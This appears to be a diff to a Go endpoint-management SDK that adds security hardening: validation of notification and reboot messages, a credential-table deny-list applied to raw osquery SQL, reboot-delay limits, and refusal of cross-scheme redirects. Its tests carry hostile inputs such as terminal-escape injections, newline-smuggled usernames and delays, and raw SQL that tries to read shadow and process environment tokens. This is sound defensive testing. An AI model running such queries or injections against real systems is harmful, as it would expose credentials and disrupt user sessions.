 // New returns a Manager driven by runner. A nil runner is rejected.
 func New(runner exec.Runner) (Manager, error) {
 	if runner == nil {
@@ -66,6 +73,9 @@ type notifier struct {
 }
 
 func (n *notifier) NotifyAll(ctx context.Context, title, message string) error {
+	if err := validateNotification(title, message); err != nil {
+		return err
+	}
 	return errors.Join(
 		n.sendWall(ctx, fmt.Sprintf("%s: %s", title, message)),
 		n.sendDesktopNotifications(ctx, title, message, nil),
@@ -73,6 +83,14 @@ func (n *notifier) NotifyAll(ctx context.Context, title, message string) error {
 }
 
 func (n *notifier) NotifyUsers(ctx context.Context, usernames []string, title, message string) error {
+	if err := validateNotification(title, message); err != nil {
+		return err
+	}
+	for _, u := range usernames {
+		if err := validateUsername(u); err != nil {
+			return err
+		}
+	}
 	filter := make(map[string]bool, len(usernames))
 	for _, u := range usernames {
 		filter[u] = true
@@ -81,6 +99,53 @@ func (n *notifier) NotifyUsers(ctx context.Context, usernames []string, title, m
 		n.sendWall(ctx, fmt.Sprintf("%s: %s", title, message)),
 		n.sendDesktopNotifications(ctx, title, message, filter),
 	)
+}
+
+// validateNotification rejects a title or message that would corrupt the
+// broadcast surface BEFORE any wall/notify-send command runs. A control
+// character (newline, ESC, NUL, DEL, …) can smuggle terminal escape sequences
+// into every logged-in user's TTY (wall broadcasts verbatim) or break the
+// notify-send argv/banner, so both fields must be plain text. Length is bounded
+// to keep a single notice from flooding the screen.
+func validateNotification(title, message string) error {
+	if err := validateField("notification title", title); err != nil {
+		return err
+	}
+	return validateField("notification message", message)
+}
+
+func validateField(kind, s string) error {
+	if containsControl(s) {
+		return fmt.Errorf("invalid %s: must not contain control characters", kind)
+	}
+	if len(s) > maxNotificationField {
+		return fmt.Errorf("invalid %s: must not exceed %d bytes", kind, maxNotificationField)
+	}
+	return nil
+}
+
+// validateUsername rejects a user-filter entry carrying a control character. A
+// newline in a username (e.g. "alice\nroot") can never match a real loginctl
+// session, but more importantly it must never reach the runner — fail closed at
+// the boundary rather than relying on it silently never matching.
+func validateUsername(u string) error {
+	if containsControl(u) {
+		return fmt.Errorf("invalid username %q: must not contain control characters", u)
+	}
+	return nil
+}
+
+// containsControl reports whether s holds any ASCII control character (NUL
+// through US, including newline, CR and tab) or DEL — bytes that would corrupt a
+// wall broadcast or a notify-send banner. A plain space (0x20) is left alone: it
+// is legal, argv-safe text in a notification.
+func containsControl(s string) bool {
+	for _, r := range s {
+		if r < 0x20 || r == 0x7f {
+			return true
+		}
+	}
+	return false
 }
 
 // sendWall broadcasts a message to all terminal sessions via wall (stdin). A

--- a/sys/notify/notify_runner_test.go
+++ b/sys/notify/notify_runner_test.go
@@ -38,6 +38,44 @@ func TestNew_NilRunner(t *testing.T) {
 	}
 }
 
+func TestNotifyAll_RejectsControlCharactersBeforeRunner(t *testing.T) {
+	cases := []struct {
+		name    string
+		title   string
+		message string
+	}{
+		{name: "newline in title", title: "Maint\nenance", message: "reboot soon"},
+		{name: "escape in message", title: "Maintenance", message: "reboot \x1b[2Jsoon"},
+		{name: "nul in message", title: "Maintenance", message: "reboot\x00soon"},
+		{name: "del in title", title: "Maint\x7fenance", message: "reboot soon"},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			seamPresent(t)
+			r := exectest.New(exec.Sudo)
+			err := mgr(t, r).NotifyAll(context.Background(), tc.title, tc.message)
+			if err == nil {
+				t.Fatal("NotifyAll error = nil, want a validation error")
+			}
+			if calls := r.Calls(); len(calls) != 0 {
+				t.Fatalf("NotifyAll ran %d command(s) before rejecting invalid message: %+v", len(calls), calls)
+			}
+		})
+	}
+}
+
+func TestNotifyUsers_RejectsControlCharactersBeforeRunner(t *testing.T) {
+	seamPresent(t)
+	r := exectest.New(exec.Sudo)
+	err := mgr(t, r).NotifyUsers(context.Background(), []string{"alice"}, "Maintenance", "line1\nline2")
+	if err == nil {
+		t.Fatal("NotifyUsers error = nil, want a validation error")
+	}
+	if calls := r.Calls(); len(calls) != 0 {
+		t.Fatalf("NotifyUsers ran %d command(s) before rejecting invalid message: %+v", len(calls), calls)
+	}
+}
+
 func TestNotifyAll_FullGraphicalPath(t *testing.T) {
 	seamPresent(t)
 	r := exectest.New(exec.Sudo)

--- a/sys/notify/security_machine_test.go
+++ b/sys/notify/security_machine_test.go
@@ -1,0 +1,80 @@
+package notify
+
+import (
+	"context"
+	"strings"
+	"testing"
+
+	"github.com/manchtools/power-manage-sdk/sys/exec"
+	"github.com/manchtools/power-manage-sdk/sys/exec/exectest"
+)
+
+type notificationAction int
+
+const (
+	notificationCleanBroadcast notificationAction = iota
+	notificationControlTitle
+	notificationControlMessage
+	notificationOversizedMessage
+	notificationInvalidUserFilter
+)
+
+type notificationStep struct {
+	name       string
+	action     notificationAction
+	wantReject bool
+}
+
+// TestNotificationSecurityMachine models notification dispatch as terminal and
+// desktop UI injection boundary. Clean messages may reach wall/notify-send;
+// control characters, unbounded payloads, and invalid user filters must fail
+// before any broadcast is attempted.
+func TestNotificationSecurityMachine(t *testing.T) {
+	steps := []notificationStep{
+		{name: "clean broadcast is accepted", action: notificationCleanBroadcast},
+		{name: "control title is rejected", action: notificationControlTitle, wantReject: true},
+		{name: "control message is rejected", action: notificationControlMessage, wantReject: true},
+		{name: "oversized message is rejected", action: notificationOversizedMessage, wantReject: true},
+		{name: "invalid user filter is rejected", action: notificationInvalidUserFilter, wantReject: true},
+	}
+
+	for _, step := range steps {
+		t.Run(step.name, func(t *testing.T) {
+			seamPresent(t)
+			r := exectest.New(exec.Sudo)
+			err := runNotificationStep(mgr(t, r), step.action)
+			if step.wantReject {
+				if err == nil {
+					t.Errorf("%s reached accepted state; want validation rejection", step.name)
+				}
+				if calls := r.Calls(); len(calls) != 0 {
+					t.Fatalf("%s reached notification side effects: %+v", step.name, calls)
+				}
+				return
+			}
+			if err != nil {
+				t.Fatalf("%s unexpected error: %v", step.name, err)
+			}
+			if calls := r.Calls(); len(calls) == 0 || calls[0].Name != "wall" {
+				t.Fatalf("accepted notification calls = %+v, want wall broadcast path exercised", calls)
+			}
+		})
+	}
+}
+
+func runNotificationStep(m Manager, action notificationAction) error {
+	switch action {
+	case notificationCleanBroadcast:
+		return m.NotifyAll(context.Background(), "Maintenance", "Reboot in 15 minutes")
+	case notificationControlTitle:
+		return m.NotifyAll(context.Background(), "Maint\nenance", "Reboot in 15 minutes")
+	case notificationControlMessage:
+		return m.NotifyAll(context.Background(), "Maintenance", "Reboot \x1b[2Jsoon")
+	case notificationOversizedMessage:
+		return m.NotifyAll(context.Background(), "Maintenance", strings.Repeat("A", 4097))
+	case notificationInvalidUserFilter:
+		return m.NotifyUsers(context.Background(), []string{"alice\nroot"}, "Maintenance", "Reboot in 15 minutes")
+	default:
+		return m.NotifyAll(context.Background(), "Maintenance", "Reboot in 15 minutes")
+	}
+}

--- a/sys/osquery/osquery.go
+++ b/sys/osquery/osquery.go
@@ -2,9 +2,10 @@
 // injected exec.Runner.
 //
 // Build a Querier with a Runner and call its methods; every query is escalated
-// through the Runner. The convenience table path refuses a curated deny-list of
-// credential-bearing tables before running anything; the signed RawSql escape
-// hatch is the operator's explicit path and is intentionally not gated.
+// through the Runner. Both the convenience table path AND the RawSql path refuse
+// a curated deny-list of credential-bearing tables before running anything — a
+// raw query that references a deny-listed table (in any clause) is rejected, so
+// there is no path to read shadow/sudoers/… via osquery.
 //
 //	r, _ := exec.NewRunner(exec.Sudo)
 //	q, err := osquery.New(r) // ErrNotInstalled if osqueryi is absent
@@ -38,10 +39,10 @@ var validTableName = regexp.MustCompile(`^[a-zA-Z_][a-zA-Z0-9_]*$`)
 // high-value secrets — password-hash metadata (shadow), secrets in process
 // environments (process_envs), scheduled commands (crontab), shell history
 // (shell_history), and sudoers policy (sudoers). They all pass validTableName, so
-// the shape-only check is not enough: the convenience table path refuses them so a
-// compromised control server cannot exfiltrate them through the agent's
-// privileged osquery. The signed RawSql escape hatch is intentionally NOT gated
-// here — it is the operator's explicit, CA-signed path.
+// the shape-only check is not enough: BOTH the convenience table path and the
+// RawSql path refuse them (sensitiveTableRefIn scans raw SQL for any deny-listed
+// table as a whole-word identifier) so a compromised control server cannot
+// exfiltrate them through the agent's privileged osquery by any path.
 var sensitiveTables = map[string]bool{
 	"shadow":        true,
 	"process_envs":  true,
@@ -54,6 +55,47 @@ var sensitiveTables = map[string]bool{
 // case- and whitespace-insensitive so trivial variants cannot slip past.
 func isSensitiveTable(name string) bool {
 	return sensitiveTables[strings.ToLower(strings.TrimSpace(name))]
+}
+
+// sensitiveTableRefIn returns the first deny-listed table name that appears as a
+// whole-word identifier anywhere in sql (case-insensitive), or "" if none. Raw
+// SQL is operator-supplied and osquery's grammar is rich (quoting, aliases,
+// subqueries, JOINs), so rather than parse it this gate FAILS CLOSED: any token
+// equal to a sensitive table name — even in a column, alias, or string position
+// — is treated as a reference and refused. Over-refusal is the safe direction
+// for a credential-table gate; under-refusal would leak shadow/sudoers/…
+func sensitiveTableRefIn(sql string) string {
+	lower := strings.ToLower(sql)
+	for name := range sensitiveTables {
+		if containsWord(lower, name) {
+			return name
+		}
+	}
+	return ""
+}
+
+// containsWord reports whether word occurs in s delimited by non-identifier
+// characters (so "shadow" matches `FROM shadow` / `from shadow s` but not
+// `shadowed`). Both arguments must already be lowercase.
+func containsWord(s, word string) bool {
+	for from := 0; ; {
+		i := strings.Index(s[from:], word)
+		if i < 0 {
+			return false
+		}
+		i += from
+		leftOK := i == 0 || !isIdentByte(s[i-1])
+		rightOK := i+len(word) >= len(s) || !isIdentByte(s[i+len(word)])
+		if leftOK && rightOK {
+			return true
+		}
+		from = i + 1
+	}
+}
+
+// isIdentByte reports whether b is a SQL identifier character ([A-Za-z0-9_]).
+func isIdentByte(b byte) bool {
+	return b == '_' || (b >= '0' && b <= '9') || (b >= 'a' && b <= 'z') || (b >= 'A' && b <= 'Z')
 }
 
 var (
@@ -87,14 +129,14 @@ type Querier interface {
 	IsInstalled(ctx context.Context) bool
 	// ListTables returns the names of the available osquery tables.
 	ListTables(ctx context.Context) ([]string, error)
-	// Query runs a structured query. The RawSql escape hatch (the operator's
-	// CA-signed path) is NOT gated by the deny-list; the table path refuses the
-	// credential-bearing deny-list before building any SQL. A query failure is
-	// folded into the returned *pb.OSQueryResult (Success=false), not returned
-	// as a Go error.
+	// Query runs a structured query. BOTH the table path and the RawSql path are
+	// gated by the credential-bearing deny-list before any SQL is built or run —
+	// a raw query referencing a deny-listed table is refused. A query failure
+	// (or a policy refusal) is folded into the returned *pb.OSQueryResult
+	// (Success=false), not returned as a Go error.
 	Query(ctx context.Context, query *pb.OSQuery) (*pb.OSQueryResult, error)
 	// QueryTable runs SELECT * FROM <table> after the same validity + deny-list
-	// checks as Query's table path; there is no RawSql bypass here.
+	// checks as Query's table path.
 	QueryTable(ctx context.Context, tableName string) ([]*pb.OSQueryRow, error)
 	// QuerySQL runs raw SQL and parses the JSON result rows.
 	QuerySQL(ctx context.Context, sql string) ([]*pb.OSQueryRow, error)
@@ -188,6 +230,17 @@ var tableSQL = map[string]string{
 func (c *client) Query(ctx context.Context, query *pb.OSQuery) (*pb.OSQueryResult, error) {
 	var sql string
 	if query.RawSql != "" {
+		// RawSql is gated against the same credential-table deny-list as the
+		// table path: a raw query that references a sensitive table is refused
+		// BEFORE osqueryi runs. RawSql is no longer an escape hatch around the
+		// deny-list — there is no path to read shadow/sudoers/… via osquery.
+		if name := sensitiveTableRefIn(query.RawSql); name != "" {
+			return &pb.OSQueryResult{
+				QueryId: query.QueryId,
+				Success: false,
+				Error:   fmt.Sprintf("table %q is not permitted", name),
+			}, nil
+		}
 		sql = query.RawSql
 	} else if custom, ok := tableSQL[query.Table]; ok {
 		sql = custom

--- a/sys/osquery/osquery_container_test.go
+++ b/sys/osquery/osquery_container_test.go
@@ -173,26 +173,22 @@ func TestDenyList_ThreatModelComplete_Container(t *testing.T) {
 	}
 }
 
-// TestRawSqlEscapeHatch_Container proves the documented asymmetry against the
-// real binary: the CA-signed RawSql path is NOT gated by the deny-list, so the
-// very same table the table path refuses (`shadow`) is queryable via RawSql. A
-// `count(*)` keeps password-hash material out of the test output while still
-// proving the query ran and returned structured rows.
-func TestRawSqlEscapeHatch_Container(t *testing.T) {
+// TestRawSqlGated_Container proves against the real binary that RawSql is gated
+// by the same credential-table deny-list as the table path: a raw query naming
+// `shadow` is refused and osqueryi is never run. (Supersedes the prior WS4
+// escape-hatch behaviour where signed RawSql bypassed the deny-list.)
+func TestRawSqlGated_Container(t *testing.T) {
 	res, err := realQuerier(t).Query(osqCtx(t), &pb.OSQuery{
 		RawSql: "SELECT count(*) AS n FROM shadow",
 	})
 	if err != nil {
 		t.Fatalf("Query(RawSql shadow count): unexpected Go error: %v", err)
 	}
-	if !res.GetSuccess() {
-		t.Fatalf("RawSql against deny-listed `shadow` should bypass the gate and run; got error %q", res.GetError())
+	if res.GetSuccess() || !strings.Contains(res.GetError(), "not permitted") {
+		t.Fatalf("RawSql naming deny-listed `shadow` must be refused; got success=%v err=%q", res.GetSuccess(), res.GetError())
 	}
-	if len(res.GetRows()) != 1 {
-		t.Fatalf("count(*) returned %d rows, want 1", len(res.GetRows()))
-	}
-	if _, ok := res.GetRows()[0].Data["n"]; !ok {
-		t.Errorf("RawSql count row missing `n` column: %+v", res.GetRows()[0].Data)
+	if len(res.GetRows()) != 0 {
+		t.Fatalf("refused RawSql returned %d rows, want 0", len(res.GetRows()))
 	}
 }
 

--- a/sys/osquery/osquery_coverage_test.go
+++ b/sys/osquery/osquery_coverage_test.go
@@ -66,6 +66,21 @@ func TestQuery_CustomTableSQL(t *testing.T) {
 	}
 }
 
+func TestQuery_RawSQLRefusesSensitiveTablesBeforeExec(t *testing.T) {
+	r := exectest.New(exec.Direct)
+	c := &client{binaryPath: "/usr/bin/osqueryi", r: r}
+	res, err := c.Query(context.Background(), &pb.OSQuery{QueryId: "q", RawSql: "SELECT * FROM shadow"})
+	if err != nil {
+		t.Fatalf("Query returned Go error = %v, want folded result", err)
+	}
+	if res.GetSuccess() || res.GetError() == "" {
+		t.Fatalf("Query(RawSql shadow) = %+v, want Success=false with a policy error", res)
+	}
+	if calls := r.Calls(); len(calls) != 0 {
+		t.Fatalf("RawSql sensitive query ran %d command(s) before policy rejection: %+v", len(calls), calls)
+	}
+}
+
 func TestQuery_QuerySQLErrorSurfacesInResult(t *testing.T) {
 	r := exectest.New(exec.Direct)
 	r.Push(exec.Result{Stdout: "not json"}, nil) // parse failure inside QuerySQL

--- a/sys/osquery/osquery_sensitive_test.go
+++ b/sys/osquery/osquery_sensitive_test.go
@@ -67,9 +67,11 @@ func TestQuery_DeniesSensitiveTables(t *testing.T) {
 	}
 }
 
-// The RawSql escape hatch is intentionally NOT gated by the deny-list — it is the
-// operator's explicit, CA-signed path. A raw query naming a sensitive table runs.
-func TestQuery_RawSqlBypassesDenyList(t *testing.T) {
+// RawSql is gated against the deny-list too: a raw query naming a sensitive
+// table is refused (folded into the result) BEFORE osqueryi runs — there is no
+// escape hatch around the credential-table policy. (Supersedes the prior WS4
+// behaviour where signed RawSql bypassed the gate.)
+func TestQuery_RawSqlGatedByDenyList(t *testing.T) {
 	r := exectest.New(exec.Direct)
 	r.Push(exec.Result{Stdout: `[{"hash":"x"}]`}, nil)
 	c := &client{binaryPath: "/usr/bin/osqueryi", r: r}
@@ -77,11 +79,11 @@ func TestQuery_RawSqlBypassesDenyList(t *testing.T) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	if !res.Success {
-		t.Errorf("RawSql must bypass the deny-list, got %+v", res)
+	if res.Success || res.Error == "" {
+		t.Errorf("RawSql naming `shadow` must be refused by the deny-list, got %+v", res)
 	}
-	if argv := strings.Join(r.Calls()[0].Args, " "); !strings.Contains(argv, "SELECT * FROM shadow") {
-		t.Errorf("raw SQL not passed through: %q", argv)
+	if n := len(r.Calls()); n != 0 {
+		t.Errorf("refused RawSql ran %d command(s) before the policy gate; want 0", n)
 	}
 }
 

--- a/sys/osquery/security_machine_test.go
+++ b/sys/osquery/security_machine_test.go
@@ -1,0 +1,86 @@
+package osquery
+
+import (
+	"context"
+	"testing"
+
+	pb "github.com/manchtools/power-manage-sdk/gen/go/pm/v1"
+	"github.com/manchtools/power-manage-sdk/sys/exec"
+	"github.com/manchtools/power-manage-sdk/sys/exec/exectest"
+)
+
+type osqueryPolicyAction int
+
+const (
+	osqueryAllowedTable osqueryPolicyAction = iota
+	osqueryDeniedTable
+	osqueryRawDeniedTable
+	osqueryRawDeniedTableViaCTE
+	osqueryRawProcessEnvSecret
+)
+
+type osqueryPolicyStep struct {
+	name       string
+	action     osqueryPolicyAction
+	wantReject bool
+}
+
+// TestOSQueryPolicySecurityMachine models the osquery boundary as a policy
+// automaton. Remote query input may reach the privileged osquery binary only if
+// the resolved SQL cannot touch credential-bearing tables; every rejected state
+// must fail before Runner execution.
+func TestOSQueryPolicySecurityMachine(t *testing.T) {
+	steps := []osqueryPolicyStep{
+		{name: "allowed inventory table reaches osquery", action: osqueryAllowedTable},
+		{name: "structured sensitive table is rejected", action: osqueryDeniedTable, wantReject: true},
+		{name: "raw shadow table is rejected", action: osqueryRawDeniedTable, wantReject: true},
+		{name: "raw CTE shadow table is rejected", action: osqueryRawDeniedTableViaCTE, wantReject: true},
+		{name: "raw process environment table is rejected", action: osqueryRawProcessEnvSecret, wantReject: true},
+	}
+
+	for _, step := range steps {
+		t.Run(step.name, func(t *testing.T) {
+			r := exectest.New(exec.Direct)
+			if !step.wantReject {
+				r.Push(exec.Result{Stdout: `[{"name":"linux"}]`}, nil)
+			}
+			c := &client{binaryPath: "/usr/bin/osqueryi", r: r}
+			res, err := c.Query(context.Background(), osqueryQueryForAction(step.action))
+			if err != nil {
+				t.Fatalf("Query returned Go error: %v", err)
+			}
+			if step.wantReject {
+				if res.GetSuccess() || res.GetError() == "" {
+					t.Fatalf("%s returned %+v, want folded policy rejection", step.name, res)
+				}
+				if calls := r.Calls(); len(calls) != 0 {
+					t.Fatalf("%s reached privileged osquery execution: %+v", step.name, calls)
+				}
+				return
+			}
+			if !res.GetSuccess() {
+				t.Fatalf("%s returned %+v, want success", step.name, res)
+			}
+			if calls := r.Calls(); len(calls) != 1 || !calls[0].Escalate {
+				t.Fatalf("%s calls = %+v, want one escalated osquery call", step.name, calls)
+			}
+		})
+	}
+}
+
+func osqueryQueryForAction(action osqueryPolicyAction) *pb.OSQuery {
+	switch action {
+	case osqueryAllowedTable:
+		return &pb.OSQuery{QueryId: "q", Table: "os_version"}
+	case osqueryDeniedTable:
+		return &pb.OSQuery{QueryId: "q", Table: "shadow"}
+	case osqueryRawDeniedTable:
+		return &pb.OSQuery{QueryId: "q", RawSql: "SELECT * FROM shadow"}
+	case osqueryRawDeniedTableViaCTE:
+		return &pb.OSQuery{QueryId: "q", RawSql: "WITH stolen AS (SELECT * FROM shadow) SELECT * FROM stolen"}
+	case osqueryRawProcessEnvSecret:
+		return &pb.OSQuery{QueryId: "q", RawSql: "SELECT * FROM process_envs WHERE key LIKE '%TOKEN%'"}
+	default:
+		return &pb.OSQuery{QueryId: "q", Table: "os_version"}
+	}
+}

--- a/sys/reboot/reboot.go
+++ b/sys/reboot/reboot.go
@@ -56,9 +56,11 @@ type Manager interface {
 // can't transpose the (delay, message) pair, and so future knobs (e.g. a
 // kexec fast-reboot) can be added without breaking the signature.
 type ScheduleOptions struct {
-	// Delay is the shutdown(8) TIME spec (e.g. "+5", "now", "23:00"). Empty
-	// defaults to "+1" (one minute), matching shutdown's own grace default
-	// intent while never rebooting instantly by accident.
+	// Delay is the reboot grace time, constrained to a positive relative minute
+	// offset "+N" (N >= minRebootGraceMinutes). This is deliberately narrower
+	// than shutdown(8)'s full TIME grammar: "now", "+0", a negative offset, and
+	// absolute clock times (e.g. "23:00") are rejected so a reboot always leaves
+	// a grace window for logged-in users. Empty defaults to "+1" (one minute).
 	Delay string
 	// Message, when non-empty, is the wall message broadcast to logged-in
 	// users by shutdown.

--- a/sys/reboot/reboot.go
+++ b/sys/reboot/reboot.go
@@ -22,6 +22,8 @@ import (
 	"fmt"
 	"log/slog"
 	"os"
+	"strconv"
+	"strings"
 
 	"github.com/manchtools/power-manage-sdk/sys/exec"
 )
@@ -105,17 +107,72 @@ func (rb *rebooter) IsRequired(ctx context.Context) (bool, error) {
 	return res.ExitCode == 1, nil
 }
 
+// minRebootGraceMinutes is the smallest accepted grace window. A reboot must
+// give logged-in users at least one minute of warning — "now"/"+0" would reboot
+// instantly, which is a denial-of-service against active sessions and exactly
+// what this Manager exists to schedule *around*, not trigger.
+const minRebootGraceMinutes = 1
+
 // Schedule schedules a system reboot via shutdown -r (escalated).
 func (rb *rebooter) Schedule(ctx context.Context, opts ScheduleOptions) error {
 	delay := opts.Delay
 	if delay == "" {
 		delay = "+1"
 	}
+	if err := validateDelay(delay); err != nil {
+		return err
+	}
+	if err := validateMessage(opts.Message); err != nil {
+		return err
+	}
 	args := []string{"-r", delay}
 	if opts.Message != "" {
 		args = append(args, opts.Message)
 	}
 	return rb.shutdown(ctx, "schedule reboot", args...)
+}
+
+// validateDelay constrains the shutdown TIME spec to a positive relative
+// minute offset ("+N", N >= minRebootGraceMinutes). This is deliberately
+// narrower than shutdown(8)'s full grammar: "now", "+0", a negative offset, an
+// absolute clock time, or any control-character-bearing value is rejected
+// BEFORE the escalated shutdown runs. The reboot must always leave a grace
+// window for logged-in users, and a control character (e.g. "+5\nnow") must
+// never reach the privileged command line.
+func validateDelay(delay string) error {
+	digits, ok := strings.CutPrefix(delay, "+")
+	if !ok || digits == "" {
+		return fmt.Errorf("invalid reboot delay %q: must be a relative offset of the form \"+N\" minutes", delay)
+	}
+	// strconv.Atoi accepts a leading sign, so an all-digits check is required
+	// to reject smuggled forms like "++5" or "+-1" before parsing.
+	for _, r := range digits {
+		if r < '0' || r > '9' {
+			return fmt.Errorf("invalid reboot delay %q: must be a relative offset of the form \"+N\" minutes", delay)
+		}
+	}
+	n, err := strconv.Atoi(digits)
+	if err != nil {
+		return fmt.Errorf("invalid reboot delay %q: must be a relative offset of the form \"+N\" minutes", delay)
+	}
+	if n < minRebootGraceMinutes {
+		return fmt.Errorf("invalid reboot delay %q: grace window must be at least %d minute(s)", delay, minRebootGraceMinutes)
+	}
+	return nil
+}
+
+// validateMessage rejects a wall message carrying a control character before it
+// reaches the escalated shutdown command. shutdown broadcasts the message
+// verbatim to every logged-in user's terminal, so a newline or ESC sequence
+// could inject terminal-control codes into other users' sessions. A space is
+// fine; only control characters and DEL are refused.
+func validateMessage(message string) error {
+	for _, r := range message {
+		if r < 0x20 || r == 0x7f {
+			return fmt.Errorf("invalid reboot message: must not contain control characters")
+		}
+	}
+	return nil
 }
 
 // Cancel cancels a pending scheduled reboot (escalated).

--- a/sys/reboot/reboot_test.go
+++ b/sys/reboot/reboot_test.go
@@ -106,6 +106,30 @@ func TestIsRequired_NeedsRestarting(t *testing.T) {
 	}
 }
 
+func TestSchedule_RejectsControlCharactersBeforeRunner(t *testing.T) {
+	cases := []struct {
+		name    string
+		message string
+	}{
+		{name: "newline", message: "line1\nline2"},
+		{name: "escape", message: "clear \x1b[2Jscreen"},
+		{name: "nul", message: "before\x00after"},
+		{name: "del", message: "before\x7fafter"},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			r := exectest.New(exec.Sudo)
+			err := mgr(t, r).Schedule(context.Background(), ScheduleOptions{Message: tc.message})
+			if err == nil {
+				t.Fatal("Schedule error = nil, want a validation error")
+			}
+			if calls := r.Calls(); len(calls) != 0 {
+				t.Fatalf("Schedule ran %d command(s) before rejecting invalid message: %+v", len(calls), calls)
+			}
+		})
+	}
+}
+
 func TestSchedule(t *testing.T) {
 	t.Run("zero options: default delay, no message, escalated", func(t *testing.T) {
 		r := exectest.New(exec.Sudo)

--- a/sys/reboot/security_machine_test.go
+++ b/sys/reboot/security_machine_test.go
@@ -1,0 +1,82 @@
+package reboot
+
+import (
+	"context"
+	"testing"
+
+	"github.com/manchtools/power-manage-sdk/sys/exec"
+	"github.com/manchtools/power-manage-sdk/sys/exec/exectest"
+)
+
+type rebootScheduleAction int
+
+const (
+	rebootScheduleGraceful rebootScheduleAction = iota
+	rebootScheduleImmediateNow
+	rebootScheduleImmediateZero
+	rebootScheduleNegativeDelay
+	rebootScheduleControlDelay
+	rebootScheduleControlMessage
+)
+
+type rebootScheduleStep struct {
+	name       string
+	action     rebootScheduleAction
+	wantReject bool
+}
+
+// TestRebootScheduleSecurityMachine models shutdown scheduling as a small DoS
+// boundary. A controlled grace period may reach shutdown; immediate, malformed,
+// or terminal-control-bearing inputs must fail before the escalated reboot
+// command is invoked.
+func TestRebootScheduleSecurityMachine(t *testing.T) {
+	steps := []rebootScheduleStep{
+		{name: "graceful reboot window is accepted", action: rebootScheduleGraceful},
+		{name: "now is rejected before shutdown", action: rebootScheduleImmediateNow, wantReject: true},
+		{name: "+0 is rejected before shutdown", action: rebootScheduleImmediateZero, wantReject: true},
+		{name: "negative delay is rejected before shutdown", action: rebootScheduleNegativeDelay, wantReject: true},
+		{name: "control character in delay is rejected", action: rebootScheduleControlDelay, wantReject: true},
+		{name: "control character in message is rejected", action: rebootScheduleControlMessage, wantReject: true},
+	}
+
+	for _, step := range steps {
+		t.Run(step.name, func(t *testing.T) {
+			r := exectest.New(exec.Sudo)
+			err := mgr(t, r).Schedule(context.Background(), rebootScheduleOptions(step.action))
+			if step.wantReject {
+				if err == nil {
+					t.Errorf("%s reached accepted state; want validation rejection", step.name)
+				}
+				if calls := r.Calls(); len(calls) != 0 {
+					t.Fatalf("%s reached escalated shutdown: %+v", step.name, calls)
+				}
+				return
+			}
+			if err != nil {
+				t.Fatalf("%s unexpected error: %v", step.name, err)
+			}
+			if calls := r.Calls(); len(calls) != 1 || calls[0].Name != "shutdown" || !calls[0].Escalate {
+				t.Fatalf("accepted transition calls = %+v, want one escalated shutdown", calls)
+			}
+		})
+	}
+}
+
+func rebootScheduleOptions(action rebootScheduleAction) ScheduleOptions {
+	switch action {
+	case rebootScheduleGraceful:
+		return ScheduleOptions{Delay: "+15", Message: "maintenance reboot"}
+	case rebootScheduleImmediateNow:
+		return ScheduleOptions{Delay: "now", Message: "maintenance reboot"}
+	case rebootScheduleImmediateZero:
+		return ScheduleOptions{Delay: "+0", Message: "maintenance reboot"}
+	case rebootScheduleNegativeDelay:
+		return ScheduleOptions{Delay: "-1", Message: "maintenance reboot"}
+	case rebootScheduleControlDelay:
+		return ScheduleOptions{Delay: "+5\nnow", Message: "maintenance reboot"}
+	case rebootScheduleControlMessage:
+		return ScheduleOptions{Delay: "+15", Message: "maintenance\x1b[2Jreboot"}
+	default:
+		return ScheduleOptions{Delay: "+15", Message: "maintenance reboot"}
+	}
+}

--- a/sys/remote/http.go
+++ b/sys/remote/http.go
@@ -355,7 +355,10 @@ func applyMode(dest, mode, owner, group string) error {
 		return nil
 	}
 	if mode != "" {
-		bits, perr := strconv.ParseUint(strings.TrimPrefix(mode, "0"), 8, 32)
+		// ParseUint(base 8) handles octal mode strings with or without a leading
+		// zero ("755", "0755", "0"); do NOT strip a leading "0" first — that turns
+		// "0" into "" and wrongly rejects octal zero.
+		bits, perr := strconv.ParseUint(mode, 8, 32)
 		if perr != nil {
 			return fmt.Errorf("invalid mode %q: %w", mode, perr)
 		}
@@ -403,13 +406,16 @@ func chownNoFollow(dest string, uid, gid int) error {
 func defaultHTTPClient() *http.Client {
 	return &http.Client{
 		Timeout: 30 * time.Minute,
-		// Refuse any redirect that changes host:port. A download is pinned to a
-		// URL; letting a redirect choose a different host lets a compromised
-		// origin substitute the bytes (and is an SSRF vector toward internal
-		// services). Same-host path redirects are allowed but bounded.
+		// Refuse any redirect that changes the origin (scheme OR host:port). A
+		// download is pinned to a URL; letting a redirect choose a different host
+		// lets a compromised origin substitute the bytes (and is an SSRF vector
+		// toward internal services), and a scheme change is a TLS downgrade
+		// (https -> http) that strips transport integrity from a pinned source.
+		// Same-origin path redirects are allowed but bounded.
 		CheckRedirect: func(req *http.Request, via []*http.Request) error {
-			if len(via) > 0 && req.URL.Host != via[0].URL.Host {
-				return fmt.Errorf("%w: refusing cross-host redirect %s -> %s", ErrInvalidConfig, via[0].URL.Host, req.URL.Host)
+			if len(via) > 0 && (req.URL.Scheme != via[0].URL.Scheme || req.URL.Host != via[0].URL.Host) {
+				return fmt.Errorf("%w: refusing cross-origin redirect %s://%s -> %s://%s", ErrInvalidConfig,
+					via[0].URL.Scheme, via[0].URL.Host, req.URL.Scheme, req.URL.Host)
 			}
 			if len(via) >= 10 {
 				return fmt.Errorf("%w: stopped after 10 redirects", ErrInvalidConfig)
@@ -447,7 +453,9 @@ func validateModeBits(mode string) error {
 	if mode == "" {
 		return nil
 	}
-	bits, err := strconv.ParseUint(strings.TrimPrefix(mode, "0"), 8, 32)
+	// ParseUint(base 8) accepts a leading zero; do NOT TrimPrefix "0" first (it
+	// turns "0" into "" and wrongly rejects octal zero). Mirrors applyMode.
+	bits, err := strconv.ParseUint(mode, 8, 32)
 	if err != nil {
 		return fmt.Errorf("%w: invalid mode %q", ErrInvalidConfig, mode)
 	}

--- a/sys/remote/http.go
+++ b/sys/remote/http.go
@@ -403,12 +403,56 @@ func chownNoFollow(dest string, uid, gid int) error {
 func defaultHTTPClient() *http.Client {
 	return &http.Client{
 		Timeout: 30 * time.Minute,
+		// Refuse any redirect that changes host:port. A download is pinned to a
+		// URL; letting a redirect choose a different host lets a compromised
+		// origin substitute the bytes (and is an SSRF vector toward internal
+		// services). Same-host path redirects are allowed but bounded.
+		CheckRedirect: func(req *http.Request, via []*http.Request) error {
+			if len(via) > 0 && req.URL.Host != via[0].URL.Host {
